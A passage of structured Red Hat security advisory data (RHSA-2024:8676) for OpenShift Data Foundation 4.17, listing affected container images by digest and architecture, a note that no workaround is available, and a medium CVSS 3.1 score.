"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", 